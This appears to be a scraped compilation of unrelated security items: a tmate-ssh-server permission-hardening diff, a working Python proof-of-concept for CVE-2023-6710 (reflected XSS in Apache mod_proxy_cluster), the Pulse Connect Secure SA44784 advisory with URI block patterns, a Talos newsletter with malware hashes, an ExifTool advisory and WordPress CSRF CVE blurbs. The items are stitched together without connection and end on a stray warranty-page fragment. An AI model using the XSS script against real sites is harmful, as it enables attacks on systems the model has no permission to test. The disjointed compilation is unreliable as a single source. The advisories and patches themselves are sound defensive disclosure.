Insecure creation of temporary directories in tmate-ssh-server 2.3.0 allows a local attacker to compromise the integrity of session handling.

@@ -98,6 +98,24 @@ static void setup\_locale(void)

tzset();

}

  

static int check\_owned\_directory\_mode(const char \*path, mode\_t expected\_mode)

{

struct stat stat;

if (lstat(path, &stat))

return -1;

  

if (!S\_ISDIR(stat.st\_mode))

return -1;

  

if (stat.st\_uid != getuid())

return -1;

  

if ((stat.st\_mode & 07777) != expected\_mode)

return -1;

  

return 0;

}

  

int main(int argc, char \*\*argv, char \*\*envp)

{

int opt;

@@ -151,17 +169,22 @@ int main(int argc, char \*\*argv, char \*\*envp)

tmate\_catch\_sigsegv();

tmate\_init\_rand();

  

if ((mkdir(TMATE\_WORKDIR, 0701) < 0 && errno != EEXIST) ||

(mkdir(TMATE\_WORKDIR "/sessions", 0703) < 0 && errno != EEXIST) ||

if ((mkdir(TMATE\_WORKDIR, 0700) < 0 && errno != EEXIST) ||

(mkdir(TMATE\_WORKDIR "/sessions", 0700) < 0 && errno != EEXIST) ||

(mkdir(TMATE\_WORKDIR "/jail", 0700) < 0 && errno != EEXIST))

tmate\_fatal("Cannot prepare session in " TMATE\_WORKDIR);

  

/\* The websocket server needs to access the /session dir to rename sockets \*/

if ((chmod(TMATE\_WORKDIR, 0701) < 0) ||

(chmod(TMATE\_WORKDIR "/sessions", 0703) < 0) ||

if ((chmod(TMATE\_WORKDIR, 0700) < 0) ||

(chmod(TMATE\_WORKDIR "/sessions", 0700) < 0) ||

(chmod(TMATE\_WORKDIR "/jail", 0700) < 0))

tmate\_fatal("Cannot prepare session in " TMATE\_WORKDIR);

  

if (check\_owned\_directory\_mode(TMATE\_WORKDIR, 0700) ||

check\_owned\_directory\_mode(TMATE\_WORKDIR "/sessions", 0700) ||

check\_owned\_directory\_mode(TMATE\_WORKDIR "/jail", 0700))

tmate\_fatal(TMATE\_WORKDIR " and subdirectories has incorrect ownership/mode. "

"Try deleting " TMATE\_WORKDIR " and try again");

  

tmate\_ssh\_server\_main(tmate\_session,

tmate\_settings->keys\_dir, tmate\_settings->bind\_addr, tmate\_settings->ssh\_port);

return 0;

CVE-2021-44513: Harden /tmp/tmate directory · tmate-io/tmate-ssh-server@1c020d1

Apache mod_proxy_cluster suffers from a cross site scripting vulnerability.

    import requestsimport argparsefrom bs4 import BeautifulSoupfrom urllib.parse import urlparse, parse_qs, urlencode, urlunparsefrom requests.exceptions import RequestExceptionclass Colors:    RED = '\033[91m'    GREEN = '\033[1;49;92m'    RESET = '\033[0m'def get_cluster_manager_url(base_url, path):    print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)    try:        response = requests.get(base_url + path)        response.raise_for_status()    except requests.exceptions.RequestException as e:        print(Colors.RED + f"Error: {e}" + Colors.RESET)        return None    print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)    if response.status_code == 200:        print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)        # Use BeautifulSoup to parse the HTML content        soup = BeautifulSoup(response.text, 'html.parser')        # Find all 'a' tags with 'href' attribute        all_links = soup.find_all('a', href=True)        # Search for the link containing the Alias parameter in the href attribute        cluster_manager_url = None        for link in all_links:            parsed_url = urlparse(link['href'])            query_params = parse_qs(parsed_url.query)            alias_value = query_params.get('Alias', [None])[0]            if alias_value:                print(Colors.GREEN + f"Alias value found" + Colors.RESET)                cluster_manager_url = link['href']                break        if cluster_manager_url:            print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)            return cluster_manager_url        else:            print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)            return None    print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")    return Nonedef update_alias_value(url):    parsed_url = urlparse(url)    query_params = parse_qs(parsed_url.query, keep_blank_values=True)    query_params['Alias'] = ["<DedSec-47>"]    updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))    print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)    return updated_urldef check_response_for_value(url, check_value):    response = requests.get(url)    if check_value in response.text:        print(Colors.RED + "Website is vulnerable POC by :")        print(Colors.GREEN + """          ____           _ ____                  _  _ _____          |  _ \  ___  __| / ___|  ___  ___      | || |___  |         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /          | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /           |____/ \___|\__,_|____/ \___|\___|        |_|/_/                                        github.com/DedSec-47    """)    else:        print(Colors.GREEN + "Website is not vulnerable POC by :")        print(Colors.GREEN + """          ____           _ ____                  _  _ _____          |  _ \  ___  __| / ___|  ___  ___      | || |___  |         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /          | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /           |____/ \___|\__,_|____/ \___|\___|        |_|/_/                                        github.com/DedSec-47    """)def main():    # Create a command-line argument parser    parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")    # Add a command-line argument for the target (-t/--target)    parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)    # Add a command-line argument for the URL path (-u/--url)    parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)    # Parse the command-line arguments    args = parser.parse_args()    # Get the cluster manager URL from the specified website    cluster_manager_url = get_cluster_manager_url(args.target, args.url)    # Check if the cluster manager URL is found    if cluster_manager_url:        # Modify the URL by adding the cluster manager value        modified_url = args.target + cluster_manager_url        modified_url = update_alias_value(args.target + cluster_manager_url)        print(Colors.GREEN + "Check executed successfully" + Colors.RESET)        # Check the response for the value "<DedSec-47>"        check_response_for_value(modified_url, "<DedSec-47>")if __name__ == "__main__":    main()

Apache mod_proxy_cluster Cross Site Scripting

Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.

**Related Articles**

Product Affected

Pulse Connect Secure

Problem

Multiple vulnerabilities were discovered and have been resolved in Pulse Connect Secure (PCS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. Many of these vulnerabilities have a critical CVSS score and pose a significant risk to your deployment.

Refer to KB43892 - What releases will Pulse Secure apply fixes to resolve security vulnerabilities? for our End of Engineering (EOE) and End of Life (EOL) policies.

The table below provides details of the vulnerability:

**CVE**

**CVSS Score (V3.1)**

**Summary**

**Product Affected**

CVE-2021-22893

10 Critical  
3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Multiple use after free in Pulse Connect Secure before 9.1R11.4 allows a remote unauthenticated attacker to execute arbitrary code via license services.

  
PCS 9.0R3/9.1R1 and Higher  
 

CVE-2021-22894

9.9 Critical CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Buffer overflow in Pulse Connect Secure Collaboration Suite before 9.1R11.4 allows a remote authenticated users to execute arbitrary code as the root user via maliciously crafted meeting room.

PCS:  
9.1Rx  
9.0Rx

CVE-2021-22899

9.9 Critical CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Command Injection in Pulse Connect Secure before 9.1R11.4 allows a remote authenticated users to perform remote code execution via Windows File Resource Profiles.

PCS:  
9.1Rx  
9.0Rx

CVE-2021-22900

7.2 High  
3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Multiple unrestricted uploads in Pulse Connect Secure before 9.1R11.4 allow an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.

PCS:  
9.1Rx  
9.0Rx

Solution

**The solution for these vulnerabilities is to upgrade the Pulse Connect Secure server software version to the 9.1R.11.4.** 

**IMPORTANT NOTE:**  The latest Integrity Checker Utility found here must be run PRIOR to upgrading your PCS appliance to ensure your appliance has not been impacted.     

If the PCS version is installed:

Then deploy this version (or later) to resolve the issue:

Expected Release

Notes (if any)

Pulse Connect Secure 9.0RX & 9.1RX

Pulse Connect Secure 9.1R11.4

Available Now

**Known cert issue for browser clients if upgrading from any version below 9.1R8.  See** **KB44781**

_Document History:_  
April 20, 2021 - Initial advisory posted and workaround files posted under Download Centre.  
May 3, 2021 - Added 3 (CVE-2021-22894, CVE-2021-22899, CVE-2021-22900) additional CVE's and software posted to the Download Centre.  
May 25, 2021 - Highlighted upgrade process including running the Integrity Checker Utility prior to upgrade.

**LEGAL DISCLAIMER**

*   THIS ADVISORY IS PROVIDED ON AN “AS IS” BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.  USE OF THIS INFORMATION FOUND IN THIS ADVISORY OR IN MATERIALS LINKED HERE FROM IS AT THE USER’S OWN RISK.  PULSE SECURE RESERVES THE RIGHT TO CHANGE OR UPDATE THIS ADVISORY AT ANY TIME.
*   A STANDALONE COPY OR PARAPHRASE OF THE TEXT OF THIS ADVISORY THAT OMITS THE DISTRIBUTION URL IS AN UNCONTROLLED COPY AND MAY OMIT IMPORTANT INFORMATION OR CONTAIN ERRORS.  THE INFORMATION IN THIS ADVISORY IS INTENDED FOR END USERS OF PULSE SECURE PRODUCTS.

Workaround

**CVE-2021-22893, CVE-2021-22894, CVE-2021-22899 can be mitigated by importing the Workaround-2104.xml file.**

**Impact:** XML File disables the following features under PCS appliance.

*   Windows File Share Browser
*   Pulse Secure Collaboration

We are using the blacklisting feature to disable the URL-Based Attack.

**Download**

Download (Download Center at https://my.pulsesecure.net)

**Note:**

*   XML file is the zipped format, please unzip and then import the XML file.
*   Import of this XML into any one node of a Cluster is enough.

Customers can download and import the file under the following location:  
Go to Maintenance > Import/Export > Import XML. Import the file. 

*   This disables the Pulse Collaboration & Windows File Share browser functionality.
*   If there is a load balancer in front of the PCS, this may affect the Load Balancer.
    *   If your load balancer is using round-robin or using HealthCheck.cgi or advanced healthcheck.cgi, it will not be affected.

Disable the Windows File Browser and Pulse Collaboration on the Admin UI following the steps below,

*   Navigate to User > User Role > Click Default Option >> Click on General 
*   Under the Access Feature, make sure the "Files, Window" & "Meetings" options are not checked.
*   Go to Users > User Roles
*   Click on each role in turn and ensure under the Access Feature of each role, the **File, Windows** & **Meetings** options are not enabled.

There is no need to reboot or restart services under the Pulse Secure Appliance.

The URIs are as follows in case you want to block them at your network edge using an inline load balancer doing SSL decryption:

^/+dana/+meeting  
^/+dana/+fb/+smb  
^/+dana-cached/+fb/+smb  
^/+dana-ws/+namedusers  
^/+dana-ws/+metric

This is only possible if there is an inline load balancer that does SSL decryption.  

**NOTE:** When you apply the 9.1R11.4 release fix, please remove the workaround with the following steps:

*   Importing the attached file remove-workaround-2104.xml (found in the same download location as the Workaround-2104.xml Download (Download Center at https://my.pulsesecure.net))
*   Restore the previous settings for "Files, Windows" & "Meetings".

**Limitations:**

*   Workaround-2014.xml does not work 9.0R1 - 9.0R4.1 or 9.1R1-9.1R2. If your PCS is running one of these versions, upgrade before doing the import.
*   The workaround is not recommended for a license server. We recommend minimizing who can connect to a license server. For example, place a license server on a management VLAN, or have a firewall enforce source-IP restrictions. 

Implementation

**Frequently Asked Questions (FAQ):**

**Question 1: Why do I need to run the latest version of the Integrity Checker Tool prior to upgrading to the latest PCS release?**  
Answer: Running the Integrity Checker Tool against unsupported PCS versions will not return scan results. Please see the ICT KB for details on the expected output.  To validate the supported versions of the Integrity Checker Tool against the supported PCS versions please visit KB44755 - Pulse Connect Secure (PCS) Integrity Assurance

**Question 1: What if I upgraded to 9.1r11.4 without running, or ran an unsupported version, of the Integrity Checker Tool?**  
Answer: Pulse Secure recommends rolling back to the previous version using the administrator console to run the latest version of Integrity Checker Tool given the nature of the threat actors ability to allow persistency throughout upgrade.  

1.  Take system offline 
    

2.  Roll back to previous version 
    

3.  Run ICT on previous version 
    

4.  If clean, then upgrade again 
    

5.  If file additions/mismatches are found follow the mitigation steps mentioned here:  KB44764 - Customer FAQ: PCS Security Integrity Tool Enhancements
    

NOTE: Only one rollback version is stored in the rollback partition.  I.E. if you upgraded from 9.1r11 to 9.1r11.3 then to 9.1r11.4 you will only be able to rollback to 9.1r11.3.    

**Question 3: I've already applied the XML do I need to install 9.1R11.4?**  
Answer: If you are on 9.1R9 or above and have applied the XML we are still recommending moving to 9.1R11.4 to fully patch against the latest vulnerabilities. 

If you are running any version below 9.1R9 even with the applied XML you are susceptible to old vulnerabilities so we highly recommend upgrading to 9.1R9 or R10 code branches with the applied XML or 9.1R11.4.

**Question 4: Will the device reboot after importing the XML File?**  
Answer: No, the Workaround-2104.xml file does not reboot or restart services under the Pulse Secure Appliance.

**Question 5: We are using A/A or A/P Cluster, do we need to import the XML file individually on each node?**  
**Answer:** No, we need to import Workaround-2104.xml under one node, the cluster will sync the configuration between nodes.

**Question 6:** ****How do I **upgrade Pulse Connect Secure** to resolve this vulnerability?****  
Answer:  Download a fixed version of the Pulse Connect Secure available from the Licensing & Download Center at https://my.pulsesecure.net.  For upgrade documentation, please refer to:

*   Upgrade PCS Cluster
*   Upgrade PCS Standalone Device

**Question 7:  I do not have access to my.pulsesecure.net to download the recommended PCS version?**  
Answer: Please refer KB40031 to Onboarding at my.pulsesecure.net. If you face any issues, please contact Pulse Secure Global Support Center.

**Question 8:  How we can restore File Share & Meeting functionality post-upgrade to the 9.1R11.4 PCS version?**  
Answer: Post upgrade to PCS 9.1R11.4, Please import the remove-workaround-2104.xml to restore the settings.

*   Download the remove-workaround-2104.xml (found in the same download location as the Workaround-2104.xml Download (Download Center at https://my.pulsesecure.net))
    *   \# Once redirected to my.pulsesecure.net  
        \# Login to my.pulsesecure.net  
        \# Click Software Licensing and Download  
        \# Select Pulse License and Download Center  
        \# Software Download (LEFT)  
        \# Select the Product Line and Product Type as Pulse Connect Secure >>  
        \# Click on Download for "Pulse Connect Secure SA44784 Workaround XML"  
        \# Accept to compliance and Agreement  
        \# Select View detail under "ps-pcs-sa-44784-remove-workaround-2104.xml.zip"  
        \# Scroll down and click on Download.
*   Go to Maintenance > Import/Export > Import XML. Import the **remove-workaround-2104.xml.**
*   It will restore **Pulse Collaboration** & **Windows File Share** browser functionality.

CVSS Score

10 Critical 3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Alert Type

SA - Security Advisory

CVE-2021-22893: Public KB - SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4

A buffer overflow vulnerability exists in Pulse Connect Secure before 9.1R11.4 allows a remote authenticated attacker to execute arbitrary code as the root user via maliciously crafted meeting room.

CVE-2021-22894: Public KB - SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4

In the case of pig butchering scams, it’s not really anything that can be solved by a cybersecurity solution or sold in a package.

Thursday, March 21, 2024 14:00

Whether you want to call them “catfishing,” “pig butchering” or just good ‘old-fashioned “social engineering,” romance scams have been around forever.  

I was first introduced to them through the MTV show “Catfish,” but recently they seem to be making headlines as the term “pig butchering” enters the public lexicon. John Oliver recently covered it on “Last Week Tonight,” which means everyone my age with an HBO account heard about it a few weeks ago. And one of my favorite podcasts going, “Search Engine,” just covered it in an episode. 

The concept of “pig butchering” scams generally follows the same chain of events: 

*   An unknown phone number texts or messages a target with a generally harmless message, usually asking for a random name disguised as an “Oops, wrong number!” text. 
*   When the target responds, the actor tries to strike up a conversation with a friendly demeanor. 
*   If the conversation persists, they usually evolve into “love bombing,” including compliments, friendly advice, ego-boosting, and saying flattering things about any photos the target has sent. 
*   Sometimes, the relationship may turn romantic. 
*   The scammer eventually “butchers” the “pig” that has been “fattened up” to that point, scamming them into handing over money, usually in the form of a phony cryptocurrency app, or just straight up asking for the target to send the scammer money somehow. 

There are a few twists and turns along the way based on the exact scammer, but that’s generally how it works. What I think is important to remember is that this specific method of separating users from their money is not actually new.  

The FBI seems to release a renewed warning about romance scams every Valentine’s Day when people are more likely to fall for a stranger online wanting to make a real connection and then eventually asking for money. I even found a podcast from the FBI in 2015 in which they warned that scammers “promise love, romance, to entice their victims online,” estimating that romance-related scams cost consumers $82 million in the last half of 2014.  

The main difference that I can tell between “pig butchering” and past romance scams is the sheer scale. Many actors running these operations are relying on human trafficking and sometimes literal imprisonment, forcing these people against their will to send these mass blocks of messages to a variety of targets indiscriminately. Oftentimes in these groups, scammers who are less “successful” in luring victims can be verbally and physically harassed and punished. That is, of course, a horrible human toll that these operations are taking, but they also extend far beyond the world of cybersecurity. 

In the case of pig butchering scams, it’s not really anything that can be solved by a cybersecurity solution or sold in a package. Instead, it relies on user education and the involvement of law enforcement agencies and international governments to ensure these farms can’t operate in the shows. The founders who run them are brought to justice. 

It’s never a bad thing that users become more educated on these scams, because of that, but I also feel it’s important to remember that romance-related scams, and really any social engineering built on a personal “relationship,” has been around for years, and “pig butchering” is not something new that just started popping up. 

These types of scams are ones that our culture has kind of just accepted as part of daily life at this point (who doesn’t get surprised when they get a call about their “car’s extended warranty?), and now the infrastructure to support these scams is taking a larger human toll than ever. 

**The one big thing **

Talos has yet another round of research into the Turla APT, and now we’re able to see the entire kill chain this actor uses, including the tactics, techniques and procedures (TTPs) utilized to steal valuable information from their victims and propagate through their infected enterprises. Before deploying TinyTurla-NG, Turla will attempt to configure anti-virus software exclusions to evade detection of their backdoor. Once exclsions have been set up, TTNG is written to the disk, and persistence is established by creating a malicious service. 

**Why do I care? **

Turla, and this recently discovered TinyTurlaNG tool that Talos has been writing about, is an international threat that’s been around for years, so it’s always important for the entire security community to know what they’re up to. Most recently, Turla used these tactics to target Polish non-governmental organizations (NGOs) and steal sensitive data.  

**So now what? **

During Talos’ research into TinyTurla-NG, we’ve released several new rounds of detection content for Cisco Secure products. Read our past two blog posts on this actor for more.  

**Top security headlines of the week **

**The Biden administration issued a renewed warning to public water systems and operators this week,** saying state-sponsored actors could carry out cyber attacks soon, citing ongoing threats from Iran and China. The White House and U.S. Environmental Protection Agency sent a letter to every U.S. governor this week warning them that cyber attacks could disrupt access to clean drinking water and “impose significant costs on affected communities.” The letter also points to the U.S. Cyber and Infrastructure Security Agency’s list of known exploited vulnerabilities catalog, asking the managers of public water systems to ensure their systems are patched against these vulnerabilities. The EPA pointed to Volt Typhoon, a recently discovered Chinese APT that has reportedly been hiding on critical infrastructure networks for an extended period. A meeting among federal government leaders from the EPA and other related agencies is scheduled for March 21 to discuss threats to public water systems and how they can strengthen their cybersecurity posture. (Bloomberg, The Verge) 

**UnitedHealth says it's still recovering from a cyber attack that’s halted crucial payments to health care providers across the U.S.,** but has started releasing some of those funds this week, and expects its payment processing software to be back online soon. The cyber attack, first disclosed in February, targeted Change Healthcare, a subsidiary of United, that handles payment processing and pharmaceutical orders for hospital chains and doctors offices. UnitedHealth’s CEO said in a statement this week that the company has paid $2 billion to affected providers who spent nearly a month unable to obtain those funds or needing to switch to a paper billing system. A recently published survey from the American Hospital Association found that 94 percent of hospitals that responded experienced financial disruptions from the Change Healthcare attack, and costs at one point were hitting $1 million in revenue per day. (ABC News, CNBC) 

**Nevada’s state court system is currently weighing a case that could undo end-to-end encryption across the U.S.** The state’s Attorney General is currently suing Meta, the creators of Facebook, Instagram and WhatsApp, asking the company to remove end-to-end encryption for minors on the platform, with the promise of being able to catch and charge users who abuse the platform to lure minors. However, privacy advocates are concerned that any rulings against Meta and its encryption policies could have larger ripple effects, and embolden others to challenge encryption in other states. Nevada is arguing that Meta’s Messenger a “preferred method” for individuals targeting Nevada children for illicit activities. Privacy experts are in favor of end-to-end encryption because it safeguards messages during transmission and makes it more difficult for other parties to intercept and read them — including law enforcement agencies. (Tech Policy Press, Bloomberg Law) 

**Can’t get enough Talos? **

*   The LockBit story: Why the ransomware affiliate model can turn takedowns into disruptions 
*   Cisco Closes $28B Splunk Deal: 5 Big AI, Security And Partner Things To Know 
*   Talos Takes Ep. #176: Why no one should be relying on passive security in 2024 
*   Dissecting a complex vulnerability and achieving arbitrary code execution in Ichitaro Word 
*   Netgear wireless router open to code execution after buffer overflow vulnerability 

**Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_    

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f    
**Typical Filename:** VID001.exe    
**Claimed Product:** N/A    
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll |  
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5   
**MD5:** ff1b6bb151cf9f671c929a4cbdb64d86   
**Typical Filename:** endpoint.query   
**Claimed Product:** Endpoint-Collector   
**Detection Name:** W32.File.MalParent 

**SHA 256:** e38c53aedf49017c47725e4912fc7560e1c8ece2633c05057b22fd4a8ed28eb3   
**MD5:** c16df0bfc6fda86dbfa8948a566d32c1   
**Typical Filename:** CEPlus.docm   
**Claimed Product:** N/A    
**Detection Name:** Doc.Downloader.Pwshell::mash.sr.sbx.vioc

“Pig butchering” is an evolution of a social engineering tactic we’ve seen for years

### Impact
Arbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads

### Patches
ExifTool has already been patched in version 12.24. `exiftool_vendored.rb`, which vendors ExifTool, includes this patch in [v12.25.0](https://github.com/exiftool-rb/exiftool_vendored.rb/releases/tag/v12.25.0).

### Workarounds
No

### References
https://twitter.com/wcbowling/status/1385803927321415687
https://nvd.nist.gov/vuln/detail/CVE-2021-22204

### For more information
If you have any questions or comments about this advisory:

Open an issue in [exiftool_vendored.rb](https://github.com/exiftool-rb/exiftool_vendored.rb/issues)

**Package**

bundler exiftool\_vendored (RubyGems)

**Affected versions**

< 12.25.0

**Patched versions**

12.25.0

**Description**

**Impact**

Arbitrary code execution can occur when running exiftool against files with hostile metadata payloads

**Patches**

ExifTool has already been patched in version 12.24. exiftool_vendored.rb, which vendors ExifTool, includes this patch in v12.25.0.

**Workarounds**

No

**References**

https://twitter.com/wcbowling/status/1385803927321415687  
https://nvd.nist.gov/vuln/detail/CVE-2021-22204

**For more information**

If you have any questions or comments about this advisory:

Open an issue in exiftool\_vendored.rb

**References**

*   GHSA-q95h-cqrv-8jv5
*   https://twitter.com/wcbowling/status/1385803927321415687

 morozgrafix published the maintainer security advisory

Jan 17, 2023

**Severity**

High

7.8

/ 10

**CVSS base metrics**

Attack vector

Local

Attack complexity

Low

Privileges required

Low

User interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Weaknesses**

CWE-74

**CVE ID**

No known CVE

**GHSA ID**

GHSA-q95h-cqrv-8jv5

**Source code**

exiftool-rb/exiftool\_vendored.rb

**Credits**

*    dgollahon

Checking history

See something to contribute? Suggest improvements for this vulnerability.

GHSA-q95h-cqrv-8jv5: ExifTool vulnerable to arbitrary code execution

The PDF24 Articles To PDF WordPress plugin through 4.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2022-1828

The PDF24 Article To PDF WordPress plugin through 4.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2022-1827

The Cimy Header Image Rotator WordPress plugin through 6.1.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2022-1885

The Find and Replace All WordPress plugin before 1.3 does not have CSRF check when replacing string, which could allow attackers to make a logged admin replace arbitrary string in database tables via a CSRF attack

Search

lenovo warranty check/lookup | check warranty status | lenovo support us